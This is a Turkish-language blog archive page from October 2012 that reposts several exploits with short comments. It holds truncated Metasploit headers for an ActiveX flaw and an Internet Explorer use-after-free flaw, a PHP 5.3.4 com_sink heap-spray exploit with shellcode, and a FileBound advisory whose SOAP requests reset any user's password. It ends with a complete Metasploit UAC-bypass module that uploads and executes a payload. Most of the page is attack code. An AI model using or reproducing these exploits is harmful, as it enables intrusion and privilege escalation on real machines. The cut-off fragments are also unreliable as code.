Archive for 11 Ekim 2012

NTR ActiveX Control StopModule() Remote Code Execution

NTR ActiveX Control StopModule Uzaktan kod çalıştırma açığı

Açıkğa ilişkin güncelleme geçilmiştir. Açığın güncellendiği şuradan anlaşılabilir, Microsoft security essentials, yani windowsun kendi güvenlik duvarı ve antivirüs yazılımı tarafından zararlı yazılım olarak görülmekte ve yutulmaktadır. Exploitin tamamı kopyalanamamıştır. Exploit eksiktir.

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    include Msf::Exploit::Remote::BrowserAutopwn

    autopwn_info({


        :method     => "StopModule",

        :rank       => NormalRanking

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

MS12-063 Microsoft Internet Explorer execCommand Use-After-Free açığı
Açıkla remote uzaktan internet explorer kötü niyetli olarak kullanılabilmekte.

Code: tamamı kopyalanamamış olup, microsoft security essentials müdahale etmekte ve yutmaktadır. Demekki bu açığa ilişkin güvenlik önlemi Microsoft tarafından tüm bilgisayarlara güncellenmiş.


##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpServer::HTML


    include Msf::Exploit::RopDb

    include Msf::Exploit::Remote::BrowserAutopwn

    autopwn_info({

        :ua_minver  => "7.0",

        :ua_maxver  => "9.0",

        :rank       => GoodRanking

    def initialize(info={})


        super(update_info(info,


            'Name'           => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",

PHP 5.3.4 Win Com Module Com_sink Exploit

PHP 5.3.4 Win Com Module Com_sink de bulunan açık ve açığa ait local exploit

# Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit
# Google Dork: Nil
# Date: 9/10/2012
# Author: FB1H2S
# Software Link: PHP Windows
# Version: [5.3.4]
# Tested on: Microsoft XP Pro 2002 SP2
 
<?php
 //PHP 5.3.4 
 
 //
//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);

//048d0190
echo strlen($axespray);
echo  "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ;
echo  "By Rahul Sasi : http://twitter.com/fb1h2s\n" ;
echo  "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ;
echo  "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ;


//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
    $deodrant.=$axespray;
}


$terminate = "T";

$u[] =$deodrant;

$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;

 
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll
$vVar = new VARIANT(0x048d0000+180); 
//alert box Shellcode 
$buffer = "\x90\x90\x90".
          "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".
            "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";

$var2 = new VARIANT(0x41414242);

com_event_sink($vVar,$var2,$buffer);



 
?>

FileBound 6.2 Privilege Escalation Vulnerability

FileBound 6.2 Privilege Escalation Açığı
Local windows açığı olup açık hakkındaki açıklama:

Sense of Security - Security Advisory - SOS-12-010

Release Date.              10-Oct-2012
Last Update.               -              
Vendor Notification Date.  14-Aug-2012
Product.                   FileBound On-Site
Platform.                  Windows
Affected versions.         All versions prior to 6.2
Severity Rating.           High
Impact.                    Privilege escalation
Attack Vector.             From remote with authentication
Solution Status.           Vendor patch
CVE reference.             CVE - not yet assigned

Details.
The FileBound On-Site document management application is 
vulnerable to a privilege escalation attack by sending a 
modified password request to the FileBound web service.
By modifying the UserID value you can reset the password 
of any local user in the application without requiring 
administrative privileges.

Proof of Concept.
Authenticate to FileBound via the following web service 
method and SOAP request:

http://www.company.com/Filebound.asmx?op=Login
   <soapenv:Body>
      <fil:Login>
         <fil:UserName>sosuser</fil:UserName>
         <fil:Password>daisyp0p</fil:Password>
      </fil:Login>
   </soapenv:Body>

After authentication a request can be sent to the following 
administrator's password reset web service method and 
SOAP request:

http://www.company.com/Filebound.asmx?op=SetPassword2
   <soapenv:Body>
      <fil:SetPassword2>
         <fil:UserID>32</fil:UserID>
         <fil:Password>lightsouthern</fil:Password>
         <fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
      </fil:SetPassword2>
   </soapenv:Body>

By modifying the UserID value the password can be reset for
any existing user in the system. A response code of -1 
confirms the password reset was successful.

Solution.
Install the latest vendor patch.

Discovered by.
Nathaniel Carew from Sense of Security Labs.

About us.
Sense of Security is a leading provider of information security and
risk management solutions. Our team has expert skills in assessment 
and assurance, strategy and architecture, and deployment through to
ongoing management. We are Australia's premier application penetration
testing firm and trusted IT security advisor to many of the country's
largest organisations.


Sense of Security Pty Ltd 
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Windows Escalate UAC Execute RunAs

Windows Escalate UAC Execute RunAs Açığı
metasploit Local exploit

Code:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
	Rank = ExcellentRanking

	include Post::Common
	include Exploit::EXE
	include Post::File

	def initialize(info={})
		super( update_info( info,
			'Name'          => 'Windows Escalate UAC Execute RunAs',
			'Description'   => %q{
				This module will attempt to elevate execution level using
				the ShellExecute undocumented RunAs flag to bypass low
				UAC settings.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [
					'mubix <mubix[at]hak5.org>' # Port to local exploit
				],
			'Version'       => '$Revision$',
			'Platform'      => [ 'windows' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'Targets'       => [ [ 'Windows', {} ] ],
			'DefaultTarget' => 0,
			'References'    => [
				[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
			],
			'DisclosureDate'=> "Jan 3, 2012"
		))

		register_options([
			OptString.new("FILENAME", [ false, "File name on disk"]),
			OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
			OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
		])

	end

	def exploit

		root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
		open_key = session.sys.registry.open_key(root_key, base_key)
		lua_setting = open_key.query_value('EnableLUA')

		if lua_setting.data == 1
			print_status "UAC is Enabled, checking level..."
		else
			print_good "UAC is not enabled, no prompt for the user"
		end

		uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')

		case uac_level.data
		when 2
			print_status "UAC is set to 'Always Notify'"
			print_status "The user will be prompted, wait for them to click 'Ok'"
		when 5
			print_debug "UAC is set to Default"
			print_debug "The user will be prompted, wait for them to click 'Ok'"
		when 0
			print_good "UAC is not enabled, no prompt for the user"
		end


		#
		# Generate payload and random names for upload
		#
		payload = generate_payload_exe

		if datastore["FILENAME"]
			payload_filename = datastore["FILENAME"]
		else
			payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
		end

		if datastore["PATH"]
			payload_path = datastore["PATH"]
		else
			payload_path = session.fs.file.expand_path("%TEMP%")
		end

		cmd_location = "#{payload_path}\\#{payload_filename}"

		if datastore["UPLOAD"]
			print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
			fd = session.fs.file.new(cmd_location, "wb")
			fd.write(payload)
			fd.close
		end

		session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)

	end
end